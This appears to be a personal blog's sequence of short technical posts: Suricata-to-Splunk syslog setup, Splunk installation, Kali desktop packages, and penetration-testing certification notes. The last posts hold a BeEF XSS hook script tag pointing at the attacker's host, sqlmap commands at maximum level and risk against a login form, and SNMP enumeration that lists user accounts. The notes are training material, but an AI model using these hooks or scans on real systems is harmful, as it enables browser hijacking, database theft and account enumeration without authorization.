Thursday, November 26, 2020

[Splunk][Suricata][Syslog] Enable Syslog on Suricata for Splunk (updated on 20201126)

 [For Suricata side:]

# cd /etc/suricata/

# cp ./suricata.yaml ./suricata_with_syslog.yaml

# vi ./suricata_with_syslog.yaml

Make sure that the following lines exist:

  - syslog:

      enabled: yes

      identity: "suricata"

      facility: local5

      level: Info

:wq

# killall -9 suricata

# suricata -c /etc/suricata/suricata_with_syslog.yaml -i wlan0 -D

# vi /etc/rsyslog.conf

Add the following line into the file (P.S.: Among others, 192.168.0.253 refers to the Splunk server, and 888 represents TCP888 port):

*.*                             @@192.168.0.253:888

:wq

# /etc/init.d/rsyslog restart



[For Splunk side:]

1) Go to "Settings"->"Data Inputs"

2) Go to "TCP"->"Add new"

3) Enter "888"->Click "Next >"

4) "Select Source Type"->"Operating System"->"syslog"-"Review >"

5) "Submit >"

6) "Start Searching"

Wednesday, November 25, 2020

[Splunk] Install and Launch Splunk at Ubuntu (updated on 20201125)

 1) Download Splunk TAR file, splunk-8.1.0.1-24fd52428b5a-Linux-x86_64.tgz, to the folder, /usr/local/sbin/.


2) Execute the following commands:

# cd /usr/local/sbin

# tar -zxvf ./splunk-8.1.0.1-24fd52428b5a-Linux-x86_64.tgz -C /opt


3) Launch Splunk by executing the command below:

# /opt/splunk/bin/splunk start


4) For the first time you launch Splunk, you need to tap the SPACE button all the way to end before type y and the ENTER button to exit the Term of Service page.


5) After that, create an administrator account by following the instruction.


6) In order to have Splunk start up, execute the following commands to create a startup script:

# vi /etc/systemd/system/splunk.service

[Unit]

Description=Splunk server

[Service]

ExecStart=/opt/splunk/bin/splunk start

KillMode=process

[Install]

WantedBy=multi-user.target

Alias=splunk.service

:wq


7) Make Splunk as a startup script and launch it:

# systemctl enable splunk.service

# systemctl start splunk.service


8) At the end, launch a web browser to access http://IP:8000/.

Wednesday, November 18, 2020

[Kali][Linux]Some useful tools in Kali Linux used as your primary OS

 To have Chinese Input Methods:

# apt-get install ibus ibus-pinyin


To have a better SSH client:

# apt-get install putty


To have a better file transfer tool (support FTP and SFTP):

# apt-get install filezilla


To have the screenshot function:

# apt-get install gnome-screenshot


To monitor the status of each network adapter:

# apt-get install iptraf


To better monitor the system resource:

# apt-get install htop


To have Chrome:

# apt-get install chromium


To download BT:

# apt-get install transmission-gtk


To read/write Office files and PDF:

# apt-get install libreoffice


Friday, November 13, 2020

[eCPPT][BeEF][XSS]BeEF-XSS Installation Playbook updated on Nov 13, 2020

 [Installation:]

# cd /usr/local/sbin

# git clone https://github.com/beefproject/beef

# cd beef

# ./install

After the installation is done, change the default password by:

# vi ./config.yaml

Modify 'passwd: "beef"' to your own password before saving the file and exiting.

# ./update-geoipdb


[Execution:]

# /usr/local/sbin/beef/beef

Then browse "http://127.0.0.1:3000/ui/panel" to manage BeEF. Bear in mind that the Hook URL is "http://YOUR_IP:3000/hook.js". The hook could be used in such a snippet as shown below:

<script src="http://YOUR_IP:3000/hook.js"></script>

Thursday, November 12, 2020

[eCPPT][sqlmap]Enhance SQLMap's Success Rate

Through utilizing the parameters "--level" and "--risk", more test cases would be launched so that the scanning success rate would go higher.


For instance, below is an ordinary scanning command:

# sqlmap -u http://sql1.webapp.site/login.php --data='username=test&password=test&submit=Login' -p username --dbs


In terms of the command above, the chance of getting any useful information may not be high. However, if you try:

# sqlmap -u http://sql1.webapp.site/login.php --data='username=test&password=test&submit=Login' -p username --level 3 --risk 3 --dbs


You may get what you want directly.


Again, the parameter "--level" (ranges from 1 to 5) defines the number of checks/payload to be performed, and the parameter "--risk" (ranges from 1 to 3) reflects the type of payloads being used.

Monday, November 9, 2020

[eCPPT][SNMP]Get readable information through SNMP

 Suppose you have already owned the community string, and would like to gather readable information regarding the target, please follow the example shown below:


# apt-get update && apt-get install snmpenum


# snmpenum --help

Usage: snmpenum <IP-address> <community> <configfile>


# ll /usr/share/snmpenum/

total 44

drwxr-xr-x   2 root root  4096 Nov  9 23:28 .

drwxr-xr-x 470 root root 20480 Nov  9 23:28 ..

-rw-r--r--   1 root root   554 Mar 26  2019 cisco.txt

-rw-r--r--   1 root root   347 Mar 26  2019 linux.txt

-rw-r--r--   1 root root  1103 Apr 28  2003 README.txt

-rwxr-xr-x   1 root root  3179 Mar 26  2019 snmpenum.pl

-rw-r--r--   1 root root   512 Mar 26  2019 windows.txt


# snmpenum 10.10.10.5 private windows.txt

...

----------------------------------------

USERS

----------------------------------------


Guest

admin

Administrator

...